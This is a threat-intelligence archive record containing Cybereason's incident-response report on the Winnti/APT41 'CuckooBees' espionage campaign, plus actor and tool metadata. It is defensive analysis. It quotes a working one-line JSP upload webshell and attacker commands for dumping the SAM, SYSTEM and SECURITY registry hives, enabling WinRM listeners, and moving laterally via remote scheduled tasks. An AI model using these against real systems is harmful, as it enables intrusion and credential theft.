{ "id": "ded76cc6-a452-4369-8f68-16e05eabffa0", "created_at": "2026-04-06T03:37:21.104077Z", "updated_at": "2026-04-10T13:11:40.223208Z", "deleted_at": null, "sha1_hash": "2f4421953eab17da7490549a7d745b2e228c0bd0", "title": "Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 793464, "plain_text": "Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-06 02:53:12 UTC\r\nIn 2021, the Cybereason Nocturnus Incident Response Team investigated multiple intrusions targeting technology and\r\nmanufacturing companies located in Asia, Europe and North America. Based on the findings of our investigation, it appears\r\nthat the goal behind these intrusions was to steal sensitive intellectual property for cyber espionage purposes. \r\nCybereason assesses with moderate-high confidence that the threat actor behind the intrusion is the Winnti Group (also\r\ntracked as APT41, Blackfly and BARIUM), one of the most advanced and elusive APT groups that is known to operate on\r\nbehalf of Chinese state interests and whose members have been indicted by the US Department of Justice for severe\r\ncomputer crimes. \r\nPart 1 of this research offers a unique glimpse into the Winnti intrusion playbook, covering the techniques that were used by\r\nthe group from initial compromise to data exfiltration, as observed and analyzed by the Cybereason IR Team. Part two of\r\nthis research will offer a deep dive analysis of the group’s tools and unique malware, including undocumented newly\r\ndiscovered Winnti malware.\r\nKey Findings\r\nMulti-year Cyber Espionage Intrusions: The Cybereason IR team investigated a sophisticated and elusive cyber\r\nespionage operation that has remained undetected since at least 2019 with the goal of stealing sensitive proprietary\r\ninformation from technology and manufacturing companies, mainly in East Asia, Western Europe, and North\r\nAmerica. \r\nNewly Discovered Malware and Multi-Stage Infection Chain: Part two of the research examines both known and\r\npreviously undocumented Winnti malware which included digitally signed kernel-level rootkits as well as an\r\nelaborate multi-stage infection chain which enabled the operation to remain undetected since at least 2019.\r\nWinnti APT Group: Cybereason assesses with moderate-to-high confidence that the threat actor behind the set of\r\nintrusions is the Winnti Group, a Chinese state-sponsored APT group known for its stealth, sophistication and a focus\r\non stealing technology.  \r\nThe Winnti Playbook: This research offers a unique glimpse into the Winnti intrusion playbook, detailing the most\r\nfrequently used tactics, as well as some lesser known evasive techniques that were observed during the\r\ninvestigation. \r\nThe Winnti Attack Lifecycle\r\nDuring 2021, Cybereason Nocturnus investigated an elaborate espionage operation targeting a number of prominent\r\norganizations in Asia, Europe and North America. Cybereason attributes with moderate-to-high confidence that this\r\noperation was carried out by the Winnti APT group (also known as APT41, BARIUM, and Blackfly) - a Chinese state-sponsored APT that has been active since at least 2010. \r\nFor years, this operation has remained under the radar, concealing a multi-layered attack scheme, with a wide and quite\r\ncomprehensive toolbox. The following flow chart summarizes this group’s attack life cycle in this operation:\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 1 of 16\n\nThe attackers’ initial foothold in the organization originated from multiple vulnerabilities in the organizational ERP\r\n(Enterprise Resource Planning) platform. From there, the attackers installed persistence in the form of a WebShell and\r\nbegan conducting reconnaissance and credential dumping, enabling them to move laterally in the network. Ultimately, it\r\nallowed the attackers to steal highly sensitive information from critical servers and endpoints belonging to high-profile\r\nstakeholders. \r\nAnalysis of the data available to Cybereason suggests that the goal of the operation was focused on cyber espionage with\r\nthe aim of stealing proprietary information, R\u0026D documents, source code and blueprints for various technologies. \r\nThe attackers managed to go undetected for years by using stealthy techniques combined with state-of-the-art attack and\r\nespionage tools which included advanced rootkits. \r\nInitial Compromise\r\nAccording to the Cybereason IR investigation, the infection vector that was used to compromise Winnti targets consisted of\r\nthe exploitation of a popular ERP solution leveraging multiple vulnerabilities, some known and some that were unknown at\r\nthe time of the exploitation. \r\nOne of the first actions that were taken after a successful exploit was an attempt to find a specific DLL file under the\r\nVMware Tools folder, gthread-3.6.dll. The DLL file is invoked by the intermediate dropper, and the role of the DLL is to\r\ninject the payload into svchost.exe on the targeted system. This TTP has been observed before, and is known to be\r\ncharacteristic of the Winnti group:\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 2 of 16\n\ndir \"C:\\Program Files\\VMware\\VMware Tools\\gthread-3.6.dll\"\r\nCommand line to search for the DLL file\r\nSearching for this DLL could suggest that the attackers had already compromised that environment in the past, or that they\r\nwere attempting to avoid infecting endpoints already compromised by them.\r\nPersistence\r\nThe Cybereason Nocturnus IR team observed multiple persistence techniques that were used by Winnti over the course of\r\nthe intrusion. While some techniques are quite trivial and well-known, some persistence techniques are rare and advanced\r\nwhich only a handful of threat actors are known to have used before.\r\nPersistence Technique #1: WebShell \r\nThe first attempt to establish a foothold on “patient zero” was achieved by embedding a minimal JSP code for deploying a\r\nWebshell under the ERP Web Application server directory using an RCE exploit:\r\nThe attackers dropped an encoded VBScript version of the Webshell to the %UserProfile% directory off the ERP\r\nWeb Service account.\r\nOnce the attackers wrote the dropper to the disk, they executed the encoded VBScript file using wscript and wrote\r\nthe decoded output to a text file.\r\nThe final step was copying the output text file to a folder that is accessible externally via the ERP Web Service and\r\nchanging the extension to .jsp so it would act as a Webshell:\r\n\u003c%\r\nif(request.getParameter(\"f\")!=null)(new\r\njava.io.FileOutputStream(application.getRealPath(\"\\\\\")+request.getParameter(\"f\"))).write(request.getParameter(\"t\").getBytes());\r\n%\u003e\r\nA sample file uploader dropped by the Threat Actor\r\nIt is interesting to note that the above code has been known since at least August 2006, and has been published in several\r\nChinese hacking websites, as well on GitHub repositories owned by Chinese-speaking users introducing this code as a one-liner for trojan or backdoor uploads:\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 3 of 16\n\nJSP code snippet search results on Google \r\nMultiple instances of such .jsp files were found on ERP servers. Based on the analysis of the source files found in our\r\nsearches, we determined the aforementioned Webshell was almost identical to a publicly known Webshell called\r\nup_win32.jsp. Moreover, we found another Webshell named css.jsp, which has similarities to the code of another publicly\r\nknown Webshell called cmd_win32.jsp:\r\nERP exploitation process tree as seen in the Cybereason XDR Platform\r\nAfter establishing a Webshell-based foothold, the attackers shifted their focus to internal reconnaissance and lateral\r\nmovement efforts. This is not the first time Winnti has used Webshell as a foothold tactic; in March 2021, ESET published a\r\nreport naming Winnti as one of the groups that targeted Exchange servers and deployed Webshell on the compromised\r\nsystems.\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 4 of 16\n\nPersistence Technique #2: WinRM over HTTP/HTTPS\r\nThe Cybereason Nocturnus \u0026 IR Team investigation also revealed a second persistence mechanism that granted the\r\nattackers an additional backup entry point enabling the native Windows feature WinRM over HTTP/HTTPS on the\r\ncompromised servers.\r\nWinRM is a Microsoft Windows native remote management protocol that provides remote shell access. This protocol can be\r\nconfigured with a HTTP (Port 80) or HTTPS (Port 443) listener using the WinRM Scripting API called through a legitimate\r\nVisual Basic script file called Winrm.vbs. \r\nThe attackers executed cscript.exe to modify the system’s WinRM configuration by setting the values of\r\nEnableCompatibilityHttpListener and EnableCompatibilityHttpsListener to True, and by doing so, they enabled HTTP and\r\nHTTPS listeners for remote shell access, preserving another way of persistence with c cscript command line to enable\r\nHTTP and HTTPS listeners: \r\ncscript //nologo \"C:\\Windows\\System32\\winrm.vbs\" set winrm/config/service @{EnableCompatibilityHttpsListener=\"true\"}\r\nModifying system WinRM configuration using cscript.exe as seen in the Cybereason XDR Platform\r\nPersistence Technique #3: Loading a Signed Kernel Rootkit \r\nThe attackers leveraged a Signed Kernel Rootkit to establish an additional persistence mechanism. Detailed analysis of this\r\nstealthy rootkit will be provided in part two of this  research in the series, which offers a deep dive into the Winnti malware\r\narsenal.\r\nPersistence Technique #4: Windows Service \r\nThe attackers abused the legitimate IKEEXT and PrintNotify Windows Services to side-load Winnti DLLs and preserve\r\npersistence. Full analysis will also be provided in part two of the research.\r\nReconnaissance\r\nInitial Reconnaissance\r\nUpon gaining access to the Windows ERP server, Winnti used the following commands:\r\ncat /etc/hosts\r\nroute print\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 5 of 16\n\nThe nature of these commands suggest they may have been part of an automated vulnerability discovery process, as the ERP\r\nserver is a Windows server and cat /etc/hosts is a Unix command.\r\nAfter these commands were executed, the attackers began a more dedicated reconnaissance activity using built-in Windows\r\ncommands to gather information on the compromised server, rounding out the initial reconnaissance phase:\r\nsysteminfo\r\nnet start\r\nnet user\r\ndir c:\\ \r\nAdvanced Stages Reconnaissance\r\nAfter establishing a foothold on multiple machines in the network, Winnti began leveraging Scheduled Tasks to execute\r\nbatch scripts by the names “cc.bat” or “bc.bat”. The content of these batch files varied from one machine to another, each\r\ntime containing different reconnaissance commands based on the attackers’ goals. Examples of this type of reconnaissance\r\ncommands are as follows: \r\nCommand Technique\r\nfsutil fsinfo drives System Drives Discovery\r\nipconfig System Network Configuration Discovery\r\nnbtstat Remote System Discovery\r\nnet accounts Password Policy Discovery\r\nnet group Permission Groups Discovery\r\nnet session System Network Session Discovery\r\nnet share Network Share Discovery\r\nnet start System Service Discovery\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 6 of 16\n\nnet time System Time Discovery\r\nnet use System Network Connections Discovery\r\nnet user Account Discovery\r\nnet view Network Share Discovery\r\nnetstat System Network Connections Discovery\r\nnslookup System DNS Configuration Discovery\r\nping Remote System Discovery\r\nquery user System Owner/User Discovery\r\nsysteminfo System Information Discovery\r\ntasklist Process Discovery\r\ntracert Remote System Route Discovery\r\nwhoami Logged On User Discovery\r\nWhen the attackers gained access to a desired domain environment, they started gathering information about the domain\r\nusing built-in Windows commands again. In this phase, Cybereason Nocturnus IR team observed additional queries for\r\nusers in administrative groups along with execution of Dsquery and Dsget commands. The attackers then compressed using\r\nmakecab.exe the collected information and exfiltrated it to their servers.\r\nCredential Dumping\r\nDuring the attack, Cybereason Nocturnus observed two methods that were utilized for credential dumping: the first one used\r\nthe known reg save command, and the second was an unknown tool, named MFSDLL.exe.\r\nUsing the reg save command, the attackers attempted to dump the SYSTEM, SAM and SECURITY registry hives as\r\nfollows:\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 7 of 16\n\nreg save HKLM\\SYSTEM system.hiv\r\nreg save HKLM\\SAM sam.hiv\r\nreg save HKLM\\SECURITY security.hiv\r\nDumping these hives ultimately enabled the attackers to crack password hashes locally. \r\nThe second tool used by the attackers to dump credentials was a previously undocumented executable named MFSDLL.exe.\r\nAt the time of the investigation, Cybereason was not able to recover a copy of it to examine its content. Nevertheless, the\r\nCybereason XDR solution managed to detect how this file was used as well as what it loaded. The attackers used this tool in\r\nthe following manner:\r\nMFSDLL.exe \u003c12 characters string\u003e \u003cfile\u003e \u003cparameter\u003e (for example - MSFDLL.exe \u003c12 characters string\u003e 1.log\r\ndump)\r\nThe variations it was found to be used were:\r\nMFSDLL.exe \u003c12 characters string\u003e \u003cfile_name\u003e.log domain\r\nMFSDLL.exe \u003c12 characters string\u003e \u003cfile_name\u003e.log dump\r\nMFSDLL.exe \u003c12 characters string\u003e \u003cfile_name\u003e.log password\r\nMFSDLL.exe \u003c12 characters string\u003e \u003cfile_name\u003e.log sam\r\nMFSDLL.exe \u003c12 characters string\u003e \u003cfile_name\u003e.log minidump\r\nThe Nocturnus IR team also observed the loading of a DLL file called mktzx64.dll along with the sam command execution.\r\nThe name of this DLL was mentioned in a report by ESET detailing an espionage campaign in Asia linked to China, and it\r\nsuggests the use of Mimikatz, a popular credential dumping tool.\r\nThis manner of execution resembles ACEHASH, a credential theft and password dumping utility, which was leveraged by\r\nthe Winnti group in the past, using commands such as “c64.exe f64.data \"9839D7F1A0 -m”:\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 8 of 16\n\nMFSDLL.exe executions as seen in the Cybereason XDR Platform\r\nLateral Movement\r\nFor lateral movement, the attackers used the Windows-native Schtasks command to create remote scheduled tasks, and to\r\nexecute malicious code through the aforementioned batch files: \r\nSCHTASKS /Create /S \u003cIP Address\u003e /U \u003cUsername\u003e /p \u003cPassword\u003e /SC ONCE /TN test /TR \u003cPath to a Batch File\u003e /ST\r\n\u003cTime\u003e /RU SYSTEM\r\nThe scheduled task command line used for lateral movement\r\nThe scheduled tasks the attackers have created were created with the name test, using compromised Domain Administrator\r\ncredentials. The batch file the scheduled task executed was executed from a temp folder using the local SYSTEM account.\r\nThe attackers used these scheduled tasks to execute commands on dozens of compromised machines throughout this stage\r\nof the attack. The batch files’ content have changed from one phase of the attack to another, which were initially used to\r\nexecute reconnaissance commands and later on were used in order to distribute malicious binaries. \r\nAmong the compromised machines, the attackers were able to expand their control to the Domain Controllers using the\r\nsame method. Once the Domain Admin credentials were obtained, the attackers were able to move laterally and infect a\r\nlarge number of hosts using the stolen credentials. \r\nData Collection and Exfiltration\r\nTo collect data efficiently, the attackers have utilized a renamed Chinese-language version of WinRAR to create password-protected archives containing the stolen data. The WinRAR executable is a 32-bit command-line version of the legitimate\r\nWinRAR application. The executable was renamed to rundll32.exe, a legitimate Windows program, in order to disguise it\r\nand silently blend it in with other Windows system files:\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 9 of 16\n\nThe\r\nWinRAR renamed version\r\nConclusions\r\nIn the first part of this Winnti research, we reported the discovery of multiple sets of intrusions that went undetected for\r\nyears. These intrusions targeted technology and manufacturing companies in multiple regions of the world to steal sensitive\r\ninformation for cyber espionage purposes. \r\nBased on our analysis and the information available, we assess with moderate-to-high confidence that the attacks described\r\nin this report were carried out by the notorious Winnti APT Group, a highly sophisticated APT group operating on behalf of\r\nChinese state interests that has been active since at least 2010. The group has been known over the years for its focus on\r\nintellectual property theft. \r\nIn this part of the research, we offered readers a unique glimpse into the attacker’s playbook, forensically tracing the attack\r\nsteps from initial compromise all the way through data exfiltration. In part two of this research, we will take a deep dive into\r\nthe Winnti malware arsenal, analyzing the different implants and unique infection chains. \r\nAcknowledgments\r\nThis research has not been possible without the tireless effort, analysis, attention to details and contribution of the\r\nCybereason Incident Response team. Special thanks and appreciation goes to Matt Hart, Yusuke Shimizu, Niamh O’Connor,\r\nJim Hung, and Omer Yampel. \r\nIndicators of Compromise\r\nLOOKING FOR THE IOCs? CLICK ON THE CHATBOT DISPLAYED IN LOWER-RIGHT OF YOUR SCREEN FOR\r\nACCESS. Due to the sensitive nature of the attack, not all IOCs observed by Cybereason can be shared in our public report.\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 10 of 16\n\nPlease contact us for more information.\r\nMITRE ATT\u0026CK BREAKDOWN\r\nReconnaissance Initial Access Execution Persistence\r\nPrivilege\r\nEscalation\r\nDefense Evasion\r\nGather Victim\r\nIdentity\r\nInformation:\r\nCredentials\r\nExploit\r\nPublic-Facing\r\nApplication\r\nScheduled\r\nTask/Job\r\nServer Software\r\nComponent:\r\nWeb Shell\r\nCreate or\r\nModify\r\nSystem\r\nProcess:\r\nWindows\r\nService\r\nHijack Execution\r\nFlow: DLL Side-Loading\r\nGather Victim\r\nNetwork\r\nInformation\r\nSupply Chain\r\nCompromise\r\nInter-process\r\ncommunication\r\nHijack\r\nExecution Flow:\r\nDLL Side-Loading\r\n  Rootkit\r\n   \r\nExploitation for\r\nClient Execution\r\nProcess\r\nInjection:\r\nDynamic-link\r\nLibrary\r\nInjection\r\nProcess\r\nInjection:\r\nDynamic-link\r\nLibrary\r\nInjection\r\nMasquerading:\r\nMatch Legitimate\r\nName or\r\nLocation\r\n   \r\nCommand and\r\nScripting\r\nInterpreter:\r\nWindows\r\nCommand Shell\r\nScheduled\r\nTask/Job:\r\nScheduled Task\r\nScheduled\r\nTask/Job:\r\nScheduled\r\nTask\r\nProcess Injection:\r\nDynamic-link\r\nLibrary Injection\r\n   \r\nCommand and\r\nScripting\r\nInterpreter: Visual\r\nBasic\r\nValid Accounts:\r\nDomain\r\nAccounts\r\nValid\r\nAccounts:\r\nDomain\r\nAccounts\r\nReflective Code\r\nLoading\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 11 of 16\n\nNative API\r\nValid Accounts:\r\nLocal Accounts\r\nValid\r\nAccounts:\r\nLocal\r\nAccounts\r\nSigned Binary\r\nProxy Execution:\r\nRundll32\r\n     \r\nBoot or Logon\r\nAutostart\r\nExecution:\r\nKernel Modules\r\nand Extensions\r\n \r\nValid Accounts:\r\nDomain\r\nAccounts\r\n         \r\nValid Accounts:\r\nLocal Accounts\r\nCredential\r\nAccess\r\nDiscovery\r\nLateral\r\nmovement\r\nCollection Exfiltration\r\nCommand and\r\nControl\r\nOS\r\nCredential\r\nDumping\r\nSystem Network\r\nConfiguration\r\nDiscovery\r\nExploitation of\r\nRemote Services\r\nArchive\r\nCollected Data:\r\nArchive via\r\nUtility\r\nAutomated\r\nExfiltration\r\nApplication\r\nLayer Protocol:\r\nWeb Protocols\r\n \r\nRemote System\r\nDiscovery\r\nRemote Services:\r\nRemote Desktop\r\nProtocol\r\nAutomated\r\nCollection\r\n  Proxy\r\n \r\nPassword Policy\r\nDiscovery\r\n       \r\n \r\nPermission Groups\r\nDiscovery\r\n       \r\n \r\nNetwork Share\r\nDiscovery\r\n       \r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 12 of 16\n\nSystem Service\r\nDiscovery\r\n       \r\n \r\nSystem Time\r\nDiscovery\r\n       \r\n \r\nSystem Network\r\nConnections\r\nDiscovery\r\n       \r\n  Account Discovery        \r\n \r\nSystem\r\nOwner/User\r\nDiscovery\r\n       \r\n \r\nSystem\r\nInformation\r\nDiscovery\r\n       \r\n  Process Discovery        \r\nAbout the Researchers:\r\nChen Erlich\r\nChen has almost a decade of experience in Threat Intelligence \u0026 Research, Incident Response and Threat Hunting. Before\r\njoining Cybereason, Chen spent three years dissecting APTs, investigating underground cybercriminal groups and\r\ndiscovering security vulnerabilities in known vendors. Previously, he served as a Security Researcher in the military forces.\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 13 of 16\n\nFusao Tanida\r\nFusao spent over 10 years in the security industry. Before joining, he worked as a mobile malware researcher and a\r\ndeveloper at the security vendor and then worked at the global mobile phone manufacturer for the development of\r\nAntiVirus, VPN client on their Android mobile phone.\r\nFusao joined Cybereason in 2019 and was previously the Senior Security Analyst at the Advanced Services Team in\r\nCybereason Japan where delivered various security professional services, Incident Response, consultation and triage\r\nmalware activity alerts in SOC.\r\nOfir Ozer\r\nOfir is a Incident Response Engineer at Cybereason who has a keen interest in Windows Internals, reverse engineering,\r\nmemory analysis and network anomalies. He has years of experience in Cyber Security, focusing on Malware Research,\r\nIncident Response and Threat Hunting. Ofir started his career as a Security Researcher in the military forces and then\r\nbecame a malware researcher focusing on Banking Trojans.\r\nAkihiro Tomita\r\nAkihiro is the Senior Manager of Global Security Practice, leading Incident Response team in the APAC region and Japan.\r\nAkihiro has led a substantial number of large-scale Incident Response, Digital Forensics and Compromise Assessment\r\nengagements during recent years. Akihiro was also a former Team lead of Advanced Security Services team responsible for\r\nmanaging, developing, delivering a variety of professional services including Proactive threat hunting, Security Posture\r\nAssessment, Advanced security training and consulting services at Cybereason.\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 14 of 16\n\nNiv Yona\r\nNiv, IR Practice Director, leads Cybereason's incident response practice in the EMEA region. Niv began his career a decade\r\nago in the Israeli Air Force as a team leader in the security operations center, where he specialized in incident response,\r\nforensics, and malware analysis. In former roles at Cybereason, he focused on threat research that directly enhances product\r\ndetections and the Cybereason threat hunting playbook, as well as the development of new strategic services and offerings.\r\nDaniel Frank\r\nWith a decade in malware research, Daniel uses his expertise with malware analysis and reverse engineering to understand\r\nAPT activity and commodity cybercrime attackers. Daniel has previously shared research at RSA Conference, the Microsoft\r\nDigital Crimes Consortium, and Rootcon.\r\nASSAF DAHAN, HEAD OF THREAT RESEARCH\r\nAssaf has over 15 years in the InfoSec industry. He started his career in the military forces Cybersecurity unit where he\r\ndeveloped extensive experience in offensive security. Later in his career he led Red Teams, developed penetration testing\r\nmethodologies, and specialized in malware analysis and reverse engineering.\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 15 of 16\n\nAbout the Author\r\nCybereason Nocturnus\r\n \r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and\r\nenterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies,\r\nreverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first\r\nto release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.\r\nAll Posts by Cybereason Nocturnus\r\nSource: https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE" ], "origins": [ "web" ], "references": [ "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques" ], "report_names": [ "operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques" ], "threat_actors": [ { "id": "5bbced13-72f7-40dc-8c41-dcce75bf885e", "created_at": "2022-10-25T15:50:23.695735Z", "updated_at": "2026-04-10T02:00:05.335976Z", "deleted_at": null, "main_name": "Winnti Group", "aliases": [ "Winnti Group" ], "source_name": "MITRE:Winnti Group", "tools": [ "PipeMon", "Winnti for Windows", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "49822165-5541-423d-8808-1c0a9448d588", "created_at": "2022-10-25T16:07:23.384093Z", "updated_at": "2026-04-10T02:00:04.575678Z", "deleted_at": null, "main_name": "Barium", "aliases": [ "Brass Typhoon", "Pigfish", "Starchy Taurus" ], "source_name": "ETDA:Barium", "tools": [ "Agent.dhwf", "Agentemis", "Barlaiy", "BleDoor", "Cobalt Strike", "CobaltStrike", "Destroy RAT", "DestroyRAT", "Kaba", "Korplug", "POISONPLUG", "PlugX", "RbDoor", "RedDelta", "RibDoor", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Winnti", "Xamtrav", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "c7d9878a-e691-4c6f-81ae-84fb115a1345", "created_at": "2022-10-25T16:07:23.359506Z", "updated_at": "2026-04-10T02:00:04.556639Z", "deleted_at": null, "main_name": "APT 41", "aliases": [ "BrazenBamboo", "Bronze Atlas", "Double Dragon", "Earth Baku", "G0096", "Grayfly", "Operation ColunmTK", "Operation CuckooBees", "Operation ShadowHammer", "Red Kelpie", "SparklingGoblin", "TA415", "TG-2633" ], "source_name": "ETDA:APT 41", "tools": [ "9002 RAT", "ADORE.XSEC", "ASPXSpy", "ASPXTool", "AceHash", "Agent.dhwf", "Agentemis", "AndroidControl", "AngryRebel", "AntSword", "BLUEBEAM", "Barlaiy", "BlackCoffee", "Bladabindi", "BleDoor", "CCleaner Backdoor", "CHINACHOPPER", "COLDJAVA", "China Chopper", "ChyNode", "Cobalt Strike", "CobaltStrike", "Crackshot", "CrossWalk", "CurveLast", "CurveLoad", "DAYJOB", "DBoxAgent", "DEADEYE", "DEADEYE.APPEND", "DEADEYE.EMBED", "DEPLOYLOG", "DIRTCLEANER", "DUSTTRAP", "Derusbi", "Destroy RAT", "DestroyRAT", "DodgeBox", "DragonEgg", "ELFSHELF", "EasyNight", "Farfli", "FunnySwitch", "Gh0st RAT", "Ghost RAT", "HDD Rootkit", "HDRoot", "HKDOOR", "HOMEUNIX", "HUI Loader", "HidraQ", "HighNoon", "HighNote", "Homux", "Hydraq", "Jorik", "Jumpall", "KEYPLUG", "Kaba", "Korplug", "LATELUNCH", "LOLBAS", "LOLBins", "LightSpy", "Living off the Land", "Lowkey", "McRAT", "MdmBot", "MessageTap", "Meterpreter", "Mimikatz", "MoonBounce", "MoonWalk", "Motnug", "Moudour", "Mydoor", "NTDSDump", "PACMAN", "PCRat", "PINEGROVE", "PNGRAT", "POISONPLUG", "POISONPLUG.SHADOW", "POTROAST", "PRIVATELOG", "PipeMon", "PlugX", "PortReuse", "ProxIP", "ROCKBOOT", "RbDoor", "RedDelta", "RedXOR", "RibDoor", "Roarur", "RouterGod", "SAGEHIRE", "SPARKLOG", "SQLULDR2", "STASHLOG", "SWEETCANDLE", "ScrambleCross", "Sensocode", "SerialVlogger", "ShadowHammer", "ShadowPad Winnti", "SinoChopper", "Skip-2.0", "SneakCross", "Sogu", "Speculoos", "Spyder", "StealthReacher", "StealthVector", "TERA", "TIDYELF", "TIGERPLUG", "TOMMYGUN", "TVT", "Thoper", "Voldemort", "WIDETONE", "WINNKIT", "WINTERLOVE", "Winnti", "WyrmSpy", "X-Door", "XDOOR", "XMRig", "XShellGhost", "Xamtrav", "ZXShell", "ZoxPNG", "certutil", "certutil.exe", "cobeacon", "gresim", "njRAT", "pwdump", "xDll" ], "source_id": "ETDA", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "945a572f-ebe3-4e2f-a288-512fe751cfa8", "created_at": "2022-10-25T16:07:24.413971Z", "updated_at": "2026-04-10T02:00:04.97924Z", "deleted_at": null, "main_name": "Winnti Group", "aliases": [ "G0044", "Leopard Typhoon", "Wicked Panda", "Winnti Group" ], "source_name": "ETDA:Winnti Group", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "FunnySwitch", "RbDoor", "RibDoor", "RouterGod", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775446641, "ts_updated_at": 1775826700, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2f4421953eab17da7490549a7d745b2e228c0bd0.pdf", "text": "https://archive.orkl.eu/2f4421953eab17da7490549a7d745b2e228c0bd0.txt", "img": "https://archive.orkl.eu/2f4421953eab17da7490549a7d745b2e228c0bd0.jpg" } }